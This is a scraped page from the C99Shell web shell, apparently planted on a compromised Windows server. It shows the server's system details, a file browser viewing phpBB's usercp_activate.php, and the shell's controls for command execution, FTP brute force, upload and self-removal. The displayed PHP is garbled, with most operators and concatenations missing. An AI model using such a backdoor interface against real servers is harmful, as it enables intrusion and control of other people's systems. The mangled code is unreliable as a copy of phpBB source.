!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\phpbb\includes\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     usercp_activate.php (3.6 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/***************************************************************************
 *                            usercp_activate.php
 *                            -------------------
 *   begin                : Saturday, Feb 13, 2001
 *   copyright            : (C) 2001 The phpBB Group
 *   email                : support@phpbb.com
 *
 *   $Id: usercp_activate.php,v 1.6.2.7 2003/05/03 23:24:02 acydburn Exp $
 *
 *
 ***************************************************************************/

/***************************************************************************
 *
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 *
 *
 ***************************************************************************/

if ( !defined('IN_PHPBB') )
{
    die(
'Hacking attempt');
    exit;
}

$sql "SELECT user_active, user_id, username, user_email, user_newpasswd, user_lang, user_actkey 
    FROM " 
USERS_TABLE "
    WHERE user_id = " 
intval($HTTP_GET_VARS[POST_USERS_URL]);
if ( !(
$result $db->sql_query($sql)) )
{
    
message_die(GENERAL_ERROR'Could not obtain user information'''__LINE____FILE__$sql);
}

if ( 
$row $db->sql_fetchrow($result) )
{
    if ( 
$row['user_active'] && trim($row['user_actkey']) == '' )
    {
        
$template->assign_vars(array(
            
'META' => '<meta http-equiv="refresh" content="10;url=' append_sid("index.$phpEx") . '">')
        );

        
message_die(GENERAL_MESSAGE$lang['Already_activated']);
    }
    else if ((
trim($row['user_actkey']) == trim($HTTP_GET_VARS['act_key'])) && (trim($row['user_actkey']) != ''))
    {
        
$sql_update_pass = ( $row['user_newpasswd'] != '' ) ? ", user_password = '" str_replace("\'""''"$row['user_newpasswd']) . "', user_newpasswd = ''" '';

        
$sql "UPDATE " USERS_TABLE "
            SET user_active = 1, user_actkey = ''" 
$sql_update_pass 
            WHERE user_id = " 
$row['user_id']; 
        if ( !(
$result $db->sql_query($sql)) )
        {
            
message_die(GENERAL_ERROR'Could not update users table'''__LINE____FILE__$sql_update);
        }

        if ( 
intval($board_config['require_activation']) == USER_ACTIVATION_ADMIN && $sql_update_pass == '' )
        {
            include(
$phpbb_root_path 'includes/emailer.'.$phpEx);
            
$emailer = new emailer($board_config['smtp_delivery']);

            
$emailer->from($board_config['board_email']);
            
$emailer->replyto($board_config['board_email']);

            
$emailer->use_template('admin_welcome_activated'$row['user_lang']);
            
$emailer->email_address($row['user_email']);
            
$emailer->set_subject($lang['Account_activated_subject']);

            
$emailer->assign_vars(array(
                
'SITENAME' => $board_config['sitename'], 
                
'USERNAME' => $row['username'],
                
'PASSWORD' => $password_confirm,
                
'EMAIL_SIG' => (!empty($board_config['board_email_sig'])) ? str_replace('<br />'"\n""-- \n" $board_config['board_email_sig']) : '')
            );
            
$emailer->send();
            
$emailer->reset();

            
$template->assign_vars(array(
                
'META' => '<meta http-equiv="refresh" content="10;url=' append_sid("index.$phpEx") . '">')
            );

            
message_die(GENERAL_MESSAGE$lang['Account_active_admin']);
        }
        else
        {
            
$template->assign_vars(array(
                
'META' => '<meta http-equiv="refresh" content="10;url=' append_sid("index.$phpEx") . '">')
            );

            
$message = ( $sql_update_pass == '' ) ? $lang['Account_active'] : $lang['Password_activated']; 
            
message_die(GENERAL_MESSAGE$message);
        }
    }
    else
    {
        
message_die(GENERAL_MESSAGE$lang['Wrong_activation']);
    }
}
else
{
    
message_die(GENERAL_MESSAGE$lang['No_such_user']);
}

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--